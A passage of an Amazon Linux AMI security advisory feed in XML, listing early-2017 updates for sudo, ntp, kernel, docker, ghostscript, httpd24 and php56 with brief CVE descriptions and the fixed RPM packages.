It was discovered that the sudo noexec restriction could have been bypassed if application run via sudo executed system() or popen() C library functions with a user supplied argument. A local user permitted to run such application via sudo with noexec restriction could use this flaw to execute arbitrary commands with elevated privileges.
1372830:
CVE-2016-7032 sudo: noexec bypass via system() and popen()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7032" title="" id="CVE-2016-7032" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7076" title="" id="CVE-2016-7076" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="sudo-devel" version="1.8.6p3" release="25.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/sudo-devel-1.8.6p3-25.23.amzn1.x86_64.rpm</filename></package><package name="sudo-debuginfo" version="1.8.6p3" release="25.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/sudo-debuginfo-1.8.6p3-25.23.amzn1.x86_64.rpm</filename></package><package name="sudo" version="1.8.6p3" release="25.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/sudo-1.8.6p3-25.23.amzn1.x86_64.rpm</filename></package><package name="sudo-devel" version="1.8.6p3" release="25.23.amzn1" epoch="0" arch="i686"><filename>Packages/sudo-devel-1.8.6p3-25.23.amzn1.i686.rpm</filename></package><package name="sudo" version="1.8.6p3" release="25.23.amzn1" epoch="0" arch="i686"><filename>Packages/sudo-1.8.6p3-25.23.amzn1.i686.rpm</filename></package><package name="sudo-debuginfo" version="1.8.6p3" release="25.23.amzn1" epoch="0" arch="i686"><filename>Packages/sudo-debuginfo-1.8.6p3-25.23.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-781</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-781: medium priority package update for ntp</title><issued date="2017-01-04 17:00:00" /><updated date="2017-01-04 17:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-9311:
1398350:
CVE-2016-9311 ntp: Null pointer dereference when trap service is enabled
CVE-2016-9310:
1397319:
CVE-2016-9310 ntp: Mode 6 unauthenticated trap information disclosure and DDoS vector
CVE-2016-7433:
1397347:
CVE-2016-7433 ntp: Broken initial sync calculations regression
CVE-2016-7429:
1397341:
CVE-2016-7429 ntp: Attack on interface selection
CVE-2016-7426:
1397345:
CVE-2016-7426 ntp: Client rate limiting and server responses
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7426" title="" id="CVE-2016-7426" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7429" title="" id="CVE-2016-7429" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7433" title="" id="CVE-2016-7433" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9310" title="" id="CVE-2016-9310" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9311" title="" id="CVE-2016-9311" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ntp-perl" version="4.2.6p5" release="43.33.amzn1" epoch="0" arch="noarch"><filename>Packages/ntp-perl-4.2.6p5-43.33.amzn1.noarch.rpm</filename></package><package name="ntp" version="4.2.6p5" release="43.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntp-4.2.6p5-43.33.amzn1.x86_64.rpm</filename></package><package name="ntp-doc" version="4.2.6p5" release="43.33.amzn1" epoch="0" arch="noarch"><filename>Packages/ntp-doc-4.2.6p5-43.33.amzn1.noarch.rpm</filename></package><package name="ntp-debuginfo" version="4.2.6p5" release="43.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntp-debuginfo-4.2.6p5-43.33.amzn1.x86_64.rpm</filename></package><package name="ntpdate" version="4.2.6p5" release="43.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntpdate-4.2.6p5-43.33.amzn1.x86_64.rpm</filename></package><package name="ntpdate" version="4.2.6p5" release="43.33.amzn1" epoch="0" arch="i686"><filename>Packages/ntpdate-4.2.6p5-43.33.amzn1.i686.rpm</filename></package><package name="ntp" version="4.2.6p5" release="43.33.amzn1" epoch="0" arch="i686"><filename>Packages/ntp-4.2.6p5-43.33.amzn1.i686.rpm</filename></package><package name="ntp-debuginfo" version="4.2.6p5" release="43.33.amzn1" epoch="0" arch="i686"><filename>Packages/ntp-debuginfo-4.2.6p5-43.33.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-782</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-782: medium priority package update for kernel</title><issued date="2017-01-04 17:00:00" /><updated date="2017-02-22 12:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-9793:
The sock_setsockopt function in net/core/sock.c in the Linux kernel before 4.8.14 mishandles negative values of sk_sndbuf and sk_rcvbuf, which allows local users to cause a denial of service (memory corruption and system crash) or possibly have unspecified other impact by leveraging the CAP_NET_ADMIN capability for a crafted setsockopt system call with the (1) SO_SNDBUFFORCE or (2) SO_RCVBUFFORCE option.
1402013:
CVE-2016-9793 kernel: Signed overflow for SO_{SND|RCV}BUFFORCE
CVE-2016-9576:
The blk_rq_map_user_iov function in block/blk-map.c in the Linux kernel before 4.8.14 does not properly restrict the type of iterator, which allows local users to read or write to arbitrary kernel memory locations or cause a denial of service (use-after-free) by leveraging access to a /dev/sg device.
1403145:
CVE-2016-9576 kernel: Use after free in SCSI generic device interface
CVE-2016-8650:
A flaw was found in the Linux kernel key management subsystem in which a local attacker could crash the kernel or corrupt the stack and additional memory (denial of service) by supplying a specially crafted RSA key. This flaw panics the machine during the verification of the RSA key.
1395187:
CVE-2016-8650 kernel: Null pointer dereference via keyctl
CVE-2016-8399:
A flaw was found in the Linux networking subsystem where a local attacker with CAP_NET_ADMIN capabilities could cause an out of bounds read by creating a smaller-than-expected ICMP header and sending to its destination via sendto().
1403833:
CVE-2016-8399 kernel: net: Out of bounds stack read in memcpy_fromiovec
CVE-2016-10147:
Algorithms not compatible with mcryptd could be spawned by mcryptd with a direct crypto_alloc_tfm invocation using a &quot;mcryptd(alg)&quot; name construct. This causes mcryptd to crash the kernel if an arbitrary &quot;alg&quot; is incompatible and not intended to be used with mcryptd.
1404200:
CVE-2016-10147 kernel: Kernel crash by spawning mcrypt(alg) with incompatible algorithm
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10147" title="" id="CVE-2016-10147" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8399" title="" id="CVE-2016-8399" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8650" title="" id="CVE-2016-8650" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9576" title="" id="CVE-2016-9576" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9793" title="" id="CVE-2016-9793" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perf" version="4.4.39" release="34.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.4.39-34.54.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.4.39" release="34.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.4.39-34.54.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.4.39" release="34.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.4.39-34.54.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.4.39" release="34.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.4.39-34.54.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.4.39" release="34.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.4.39-34.54.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.4.39" release="34.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.4.39-34.54.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.4.39" release="34.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.4.39-34.54.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.4.39" release="34.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.4.39-34.54.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.4.39" release="34.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.4.39-34.54.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.4.39" release="34.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.4.39-34.54.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.4.39" release="34.54.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.4.39-34.54.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.4.39" release="34.54.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.4.39-34.54.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.4.39" release="34.54.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.4.39-34.54.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.4.39" release="34.54.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.4.39-34.54.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.4.39" release="34.54.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.4.39-34.54.amzn1.i686.rpm</filename></package><package name="kernel" version="4.4.39" release="34.54.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.4.39-34.54.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.4.39" release="34.54.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.4.39-34.54.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.4.39" release="34.54.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.4.39-34.54.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.4.39" release="34.54.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.4.39-34.54.amzn1.i686.rpm</filename></package><package name="perf" version="4.4.39" release="34.54.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.4.39-34.54.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="4.4.39" release="34.54.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-4.4.39-34.54.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-783</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-783: important priority package update for docker</title><issued date="2017-01-10 18:00:00" /><updated date="2017-01-10 18:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-9962:
It was discovered that runC allowed additional container processes via `runc exec` to be ptraced by the pid 1 of the container. This allows the main processes of the container, if running as root, to gain access to file descriptors of these new processes during the initialization, which can lead to container escapes or modification of runC state before the process is fully placed inside the container.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9962" title="" id="CVE-2016-9962" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="docker" version="1.12.6" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/docker-1.12.6-1.17.amzn1.x86_64.rpm</filename></package><package name="docker-devel" version="1.12.6" release="1.17.amzn1" epoch="0" arch="noarch"><filename>Packages/docker-devel-1.12.6-1.17.amzn1.noarch.rpm</filename></package><package name="docker-debuginfo" version="1.12.6" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/docker-debuginfo-1.12.6-1.17.amzn1.x86_64.rpm</filename></package><package name="docker-pkg-devel" version="1.12.6" release="1.17.amzn1" epoch="0" arch="noarch"><filename>Packages/docker-pkg-devel-1.12.6-1.17.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-784</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-784: medium priority package update for ghostscript</title><issued date="2017-01-10 18:00:00" /><updated date="2017-01-10 18:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-8602:
It was found that ghostscript did not sufficiently check the validity of parameters given to the .sethalftone5 function. A specially crafted postscript document could cause a crash, or execute arbitrary code in the context of the gs process.
1383940:
CVE-2016-8602 ghostscript: check for sufficient params in .sethalftone5
CVE-2016-7979:
It was found that the ghostscript function .initialize_dsc_parser did not validate its parameter before using it, allowing a type confusion flaw. A specially crafted postscript document could cause a crash code execution in the context of the gs process.
1382305:
CVE-2016-7979 ghostscript: Type confusion in .initialize_dsc_parser allows remote code execution
CVE-2016-7977:
It was found that ghostscript function .libfile did not honor the -dSAFER option, usually used when processing untrusted documents, leading to information disclosure. A specially crafted postscript document could, in the context of the gs process, retrieve file content on the target machine.
1380415:
CVE-2016-7977 ghostscript: .libfile does not honor -dSAFER
CVE-2013-5653:
It was found that the ghostscript functions getenv and filenameforall did not honor the -dSAFER option, usually used when processing untrusted documents, leading to information disclosure. A specially crafted postscript document could read environment variable and list directory respectively, from the target.
1380327:
CVE-2013-5653 ghostscript: getenv and filenameforall ignore -dSAFER
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5653" title="" id="CVE-2013-5653" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7977" title="" id="CVE-2016-7977" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7979" title="" id="CVE-2016-7979" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8602" title="" id="CVE-2016-8602" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ghostscript-doc" version="8.70" release="21.1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-doc-8.70-21.1.24.amzn1.x86_64.rpm</filename></package><package name="ghostscript-devel" version="8.70" release="21.1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-devel-8.70-21.1.24.amzn1.x86_64.rpm</filename></package><package name="ghostscript-debuginfo" version="8.70" release="21.1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-debuginfo-8.70-21.1.24.amzn1.x86_64.rpm</filename></package><package name="ghostscript" version="8.70" release="21.1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-8.70-21.1.24.amzn1.x86_64.rpm</filename></package><package name="ghostscript-doc" version="8.70" release="21.1.24.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-doc-8.70-21.1.24.amzn1.i686.rpm</filename></package><package name="ghostscript-devel" version="8.70" release="21.1.24.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-devel-8.70-21.1.24.amzn1.i686.rpm</filename></package><package name="ghostscript" version="8.70" release="21.1.24.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-8.70-21.1.24.amzn1.i686.rpm</filename></package><package name="ghostscript-debuginfo" version="8.70" release="21.1.24.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-debuginfo-8.70-21.1.24.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-785</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-785: medium priority package update for httpd24</title><issued date="2017-01-19 16:30:00" /><updated date="2017-01-19 16:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-8743:
1406822:
CVE-2016-8743 httpd: Apache HTTP Request Parsing Whitespace Defects
CVE-2016-2161:
1406753:
CVE-2016-2161 httpd: DoS vulnerability in mod_auth_digest
CVE-2016-0736:
1406744:
CVE-2016-0736 httpd: Padding Oracle in Apache mod_session_crypto
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0736" title="" id="CVE-2016-0736" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2161" title="" id="CVE-2016-2161" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8743" title="" id="CVE-2016-8743" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="httpd24" version="2.4.25" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-2.4.25-1.68.amzn1.x86_64.rpm</filename></package><package name="httpd24-manual" version="2.4.25" release="1.68.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd24-manual-2.4.25-1.68.amzn1.noarch.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.25" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-debuginfo-2.4.25-1.68.amzn1.x86_64.rpm</filename></package><package name="mod24_session" version="2.4.25" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_session-2.4.25-1.68.amzn1.x86_64.rpm</filename></package><package name="mod24_proxy_html" version="2.4.25" release="1.68.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_proxy_html-2.4.25-1.68.amzn1.x86_64.rpm</filename></package><package name="mod24_ldap" version="2.4.25" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_ldap-2.4.25-1.68.amzn1.x86_64.rpm</filename></package><package name="mod24_ssl" version="2.4.25" release="1.68.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_ssl-2.4.25-1.68.amzn1.x86_64.rpm</filename></package><package name="httpd24-devel" version="2.4.25" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-devel-2.4.25-1.68.amzn1.x86_64.rpm</filename></package><package name="httpd24-tools" version="2.4.25" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-tools-2.4.25-1.68.amzn1.x86_64.rpm</filename></package><package name="mod24_ssl" version="2.4.25" release="1.68.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_ssl-2.4.25-1.68.amzn1.i686.rpm</filename></package><package name="httpd24" version="2.4.25" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-2.4.25-1.68.amzn1.i686.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.25" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-debuginfo-2.4.25-1.68.amzn1.i686.rpm</filename></package><package name="httpd24-devel" version="2.4.25" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-devel-2.4.25-1.68.amzn1.i686.rpm</filename></package><package name="mod24_session" version="2.4.25" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_session-2.4.25-1.68.amzn1.i686.rpm</filename></package><package name="mod24_ldap" version="2.4.25" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_ldap-2.4.25-1.68.amzn1.i686.rpm</filename></package><package name="mod24_proxy_html" version="2.4.25" release="1.68.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_proxy_html-2.4.25-1.68.amzn1.i686.rpm</filename></package><package name="httpd24-tools" version="2.4.25" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-tools-2.4.25-1.68.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-786</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-786: medium priority package update for kernel</title><issued date="2017-01-19 16:30:00" /><updated date="2017-01-19 16:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-10088:
The sg implementation in the Linux kernel through 4.9 does not properly restrict write operations in situations where the KERNEL_DS option is set, which allows local users to read or write to arbitrary kernel memory locations or cause a denial of service (use-after-free) by leveraging access to a /dev/sg device, related to block/bsg.c and drivers/scsi/sg.c. NOTE: this vulnerability exists because of an incomplete fix for CVE-2016-9576.
1412210:
CVE-2016-10088 kernel: Use after free in SCSI generic device interface (CVE-2016-9576 regression)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10088" title="" id="CVE-2016-10088" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perf" version="4.4.41" release="36.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.4.41-36.55.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.4.41" release="36.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.4.41-36.55.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.4.41" release="36.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.4.41-36.55.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.4.41" release="36.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.4.41-36.55.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.4.41" release="36.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.4.41-36.55.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.4.41" release="36.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.4.41-36.55.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.4.41" release="36.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.4.41-36.55.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.4.41" release="36.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.4.41-36.55.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.4.41" release="36.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.4.41-36.55.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.4.41" release="36.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.4.41-36.55.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.4.41" release="36.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.4.41-36.55.amzn1.i686.rpm</filename></package><package name="perf" version="4.4.41" release="36.55.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.4.41-36.55.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.4.41" release="36.55.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.4.41-36.55.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.4.41" release="36.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.4.41-36.55.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.4.41" release="36.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.4.41-36.55.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.4.41" release="36.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.4.41-36.55.amzn1.i686.rpm</filename></package><package name="kernel" version="4.4.41" release="36.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.4.41-36.55.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.4.41" release="36.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.4.41-36.55.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.4.41" release="36.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.4.41-36.55.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.4.41" release="36.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.4.41-36.55.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="4.4.41" release="36.55.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-4.4.41-36.55.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-787</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-787: medium priority package update for php56</title><issued date="2017-01-26 18:00:00" /><updated date="2017-01-26 18:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-9935:
The php_wddx_push_element function in ext/wddx/wddx.c in PHP before 5.6.29 and 7.x before 7.0.14 allows remote attackers to cause a denial of service (out-of-bounds read and memory corruption) or possibly have unspecified other impact via an empty boolean element in a wddxPacket XML document.
1404731:
CVE-2016-9935 php: Invalid read when wddx decodes empty boolean element
CVE-2016-9934:
ext/wddx/wddx.c in PHP before 5.6.28 and 7.x before 7.0.13 allows remote attackers to cause a denial of service (NULL pointer dereference) via crafted serialized data in a wddxPacket XML document, as demonstrated by a PDORow string.
1404726:
CVE-2016-9934 php: NULL Pointer Dereference in WDDX Packet Deserialization with PDORow
CVE-2016-9933:
Stack consumption vulnerability in the gdImageFillToBorder function in gd.c in the GD Graphics Library (aka libgd) before 2.2.2, as used in PHP before 5.6.28 and 7.x before 7.0.13, allows remote attackers to cause a denial of service (segmentation violation) via a crafted imagefilltoborder call that triggers use of a negative color value.
1404723:
CVE-2016-9933 php, gd: Stack overflow in gdImageFillToBorder on truecolor images
CVE-2016-9137:
Use-after-free vulnerability in the CURLFile implementation in ext/curl/curl_file.c in PHP before 5.6.27 and 7.x before 7.0.12 allows remote attackers to cause a denial of service or possibly have unspecified other impact via crafted serialized data that is mishandled during __wakeup processing.
1391000:
CVE-2016-9137 php: Use after free in unserialize()
CVE-2016-8670:
A vulnerability was found in gd. Integer underflow in a calculation in dynamicGetbuf() was incorrectly handled, leading in some circumstances to an out of bounds write through a very large argument to memcpy(). An attacker could create a crafted image that would lead to a crash or, potentially, code execution.
1391068:
CVE-2016-8670 gd, php: Stack based buffer overflow in dynamicGetbuf
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8670" title="" id="CVE-2016-8670" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9137" title="" id="CVE-2016-9137" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9933" title="" id="CVE-2016-9933" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9934" title="" id="CVE-2016-9934" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9935" title="" id="CVE-2016-9935" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php56-odbc" version="5.6.29" release="1.131.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-odbc-5.6.29-1.131.amzn1.x86_64.rpm</filename></package><package name="php56-devel" version="5.6.29" release="1.131.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-devel-5.6.29-1.131.amzn1.x86_64.rpm</filename></package><package name="php56-embedded" version="5.6.29" release="1.131.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-embedded-5.6.29-1.131.amzn1.x86_64.rpm</filename></package><package name="php56-gd" version="5.6.29" release="1.131.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gd-5.6.29-1.131.amzn1.x86_64.rpm</filename></package><package name="php56-mssql" version="5.6.29" release="1.131.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mssql-5.6.29-1.131.amzn1.x86_64.rpm</filename></package><package name="php56-opcache" version="5.6.29" release="1.131.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-opcache-5.6.29-1.131.amzn1.x86_64.rpm</filename></package><package name="php56-common" version="5.6.29" release="1.131.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-common-5.6.29-1.131.amzn1.x86_64.rpm</filename></package><package name="php56-mysqlnd" version="5.6.29" release="1.131.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mysqlnd-5.6.29-1.131.amzn1.x86_64.rpm</filename></package><package name="php56-pdo" version="5.6.29" release="1.131.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pdo-5.6.29-1.131.amzn1.x86_64.rpm</filename></package><package name="php56-pgsql" version="5.6.29" release="1.131.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pgsql-5.6.29-1.131.amzn1.x86_64.rpm</filename></package><package name="php56-dba" version="5.6.29" release="1.131.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dba-5.6.29-1.131.amzn1.x86_64.rpm</filename></package><package name="php56-tidy" version="5.6.29" release="1.131.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-tidy-5.6.29-1.131.amzn1.x86_64.rpm</filename></package><package name="php56-process" version="5.6.29" release="1.131.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-process-5.6.29-1.131.amzn1.x86_64.rpm</filename></package><package name="php56-mcrypt" version="5.6.29" release="1.131.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mcrypt-5.6.29-1.131.amzn1.x86_64.rpm</filename></package><package 